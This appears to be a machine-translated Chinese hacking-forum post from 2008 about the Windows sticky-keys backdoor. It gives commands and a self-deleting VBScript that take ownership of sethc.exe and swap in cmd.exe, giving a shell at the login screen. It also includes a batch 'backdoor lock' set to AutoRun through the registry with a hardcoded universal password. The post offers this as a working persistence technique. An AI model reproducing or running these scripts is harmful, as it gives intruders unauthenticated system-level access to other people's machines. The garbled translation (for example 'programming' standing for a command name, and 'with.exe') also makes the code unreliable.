The coolest windows Backdoor-vulnerability warning-the black bar safety net

ID MYHACK58:62200818009
Type myhack58
Reporter 佚名
Modified 2008-01-04T00:00:00


The back door principle:

Go to: small Chapter blog

In windows 2 0 0 0/xp/vista, press shift key 5 times, you can open the sticky position, 会运行sethc.exe and, in the login interface may also be open. It's reminiscent of a WINDOWS screensaver, the program will be replaced with cmd. exe, you can open the shell.

Reference McafeeAvertLabs: the

XP: The installation source disc is ejected or the hard disk on the installation directory renamed) cd %widnir%\system32\dllcache ren sethc.exe *. ex~ cd %widnir%\system32 copy /y cmd.exe sethc.exe

VISTA: programming /f c:\windows\system32\sethc.exe cacls c:\windows\system32\sethc.exe /G administrator:F Then press the XP method of replacing the file

At the login screen press 5 this SHIFT out cmd shell, and then......

The back door extensions:

Go to: 7j blog

Then update Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) success = obj. run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) success = obj. run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) success = obj. run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

The second sentence is the most interesting. Hey Responder.... 've encountered similar problems

Then update the. Add a self-delete,simplify the code... On Error Resume Next Dim obj, success Set obj = CreateObject("WScript. Shell") success = obj. run("cmd /c programming /f %SystemRoot%\system32\with. exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd. exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc. exe&del %SystemRoot%\system32\with. exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting. FileSystemObject"). DeleteFile(WScript. ScriptName)

allyesno note: deal with File Protection the way can also reference my article cut wfp 's jj easily 8 0 9 9&p=2 6 9 2 9 3

Back door lock extensions:

allyesno Note: You can use the cmd lock to cmdshell password verification Hey.... and

Use the following back door lock of the method is to put the code save for bdlock. bat

Then modify the registry location

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor] "AutoRun"="bdlock. bat"

@Echo Off title back door login authentication color a cls set temprandom=%RANDOM% echo please enter the verification code:%temprandom% set/p check= if "%check%"=="%temprandom%%temprandom%" goto passcheck if "%check%"=="%temprandom%" ( rem Backdoor Server Authentication rem if there is no back door to the authentication server please rem comment fall line of code if exist \\trojandownloader$\pass goto passcheck ) echo verify failed pause exit :passcheck echo verification successful If "%passcmdlock%"=="" Goto endx Set passcmdlock=http://blog. csdn. net/freexploit/ :allyesno Set Errorlevel=>nul Echo please enter the verification code? Set password=allyesno Is a pig>nul Set/p password= rem universal password if "%password%"=="allyesno is a sb" goto endx If %time:~1,1%==0 Set timechange=a If %time:~1,1%==1 Set timechange=b If %time:~1,1%==2 Set timechange=c If %time:~1,1%==3 Set timechange=d If %time:~1,1%==4 Set timechange=e If %time:~1,1%==5 Set timechange=f If %time:~1,1%==6 Set timechange=g If %time:~1,1%==7 Set timechange=h If %time:~1,1%==8 Set timechange=i If %time:~1,1%==9 Set timechange=j set/a sum=%time:~1,1%+%time:~1,1% Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End Echo please contact rising customer service for the correct password!& amp;Goto allyesno :End Set password=>nul Set Errorlevel=>nul Echo is very good, very harmonious! :endx